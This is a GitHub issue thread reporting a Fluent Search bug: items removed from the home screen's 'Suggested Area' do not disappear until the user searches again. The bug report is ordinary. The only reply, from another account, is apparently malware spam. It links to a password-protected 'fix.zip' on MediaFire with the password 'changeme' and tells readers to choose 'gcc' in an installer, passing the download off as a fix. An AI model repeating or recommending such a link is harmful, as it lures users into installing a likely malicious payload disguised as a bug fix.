### ISSUE TITLE
Immediate Refresh After Removing Items from "Suggested Area" on Home Screen

### ISSUE THREAD

**Issue by elo-marciello** [adirh3/Fluent-Search#1066]
**Describe the bug**
When removing items from the "Suggested Area" on the Fluent Search home screen using the "Remove from home screen" context menu option, the home screen does not immediately refresh to reflect the change. The home screen only updates after inputting something into the search bar and launching it again.

**To Reproduce**
1. Go to the home screen of Fluent Search.
2. Right-click an item in the "Suggested Area."
3. Select "Remove from home screen."
4. Observe that the item remains visible until the search bar is used and the home screen is relaunched.

**Expected behavior**
The home screen should immediately refresh and remove the item from the "Suggested Area" after selecting "Remove from home screen" without requiring further input into the search bar.

**Screenshots**

**Desktop (please complete the following information):**
- Windows 11 Version: [e.g., 22H2, OS build 22621.3880]
- Fluent Search Version: 1.0.0.45
- Installation source: Nightly

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
